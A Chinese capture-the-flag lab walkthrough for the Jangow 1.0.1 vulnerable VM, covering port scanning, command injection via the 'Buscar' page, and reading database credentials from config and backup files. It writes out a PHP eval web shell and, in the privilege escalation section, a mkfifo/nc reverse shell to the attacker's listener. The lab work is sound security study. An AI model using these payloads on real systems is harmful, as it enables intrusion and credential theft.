Jangow-1.0.1靶机

一、安装Jangow: 1.0.1靶机

下载靶机,导入到virtualBox里面
开机可以看到,他已经给出了靶机的IP地址,就不用我们自己去探测了

二、信息收集

扫描靶机的端口

首先访问80端口

扫描目录也就是一个site

点击site,来到以下界面

发现是有网页的,随便点点,看看有没有能注入或者渗透的点
发现点到Buscar时,页面变得不一样,并且网址出现了可疑的后缀

我们试着运行一下命令,发现是可以运行命令的

三、开始渗透

写一句话木马上传

echo '<?php @eval($_POST['x']); ?>' > 1.php

再用蚁剑连接

发现wordpress文件夹下有一个config.php,里面有数据库的账号密码

暂时没用,先保存一下,继续查找

发现html目录下有个backup文件,里面也有账号密码,继续寻找,找到一串md5

解密出来是这个,貌似没有扫描意义

四、提权

先尝试反弹一个shell过来,通过蚁剑写php反弹shell

<?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.204.136 443 >/tmp/f');?>

我们在另一台主机开始监听443端口

  • 5
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值